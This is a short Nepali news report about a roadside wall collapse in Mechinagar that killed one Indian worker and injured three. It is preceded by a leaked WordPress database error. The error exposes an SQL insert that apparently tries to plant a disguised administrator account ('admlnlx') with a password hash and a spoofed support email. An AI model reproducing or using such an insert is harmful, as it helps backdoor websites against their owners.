WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BzxTk3kQO7YnArqVWQ053z1RAd9T9j.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-03 15:14:28', '', 'admlnlx', 'admlnlx')
दमक, माघ १५
मेचीनगर–१ खयरडाँगीमा नगरपालिकाले बाटो किनारमा बनाउँदै गरेको पर्खाल भत्किँदा एक कामदारको मृत्यु भएको छ। मेचीनगर–१ खयरडाँगीमा पर्खाल भत्किँदा भारत बिहारका ५५ वर्षीय सुबोलसिंहको मृत्यु भएको प्रहरीले जनाएको छ। अन्य ३ भारतीय कामदार गम्भीर घाइते भएका छन्। बिर्तामोडस्थित स्थानीय अस्पताल लैजाँदै गर्दा सिंहको मृत्यु भएको जनाइएको छ। बिर्तामोडस्थित बी एण्ड सी अस्पतालमा घाइतेहरुको उपचार भइरहेको इलाका प्रहरी कार्यालय धुलाबारीका निरीक्षक राकेश थापाले जानकारी दिए।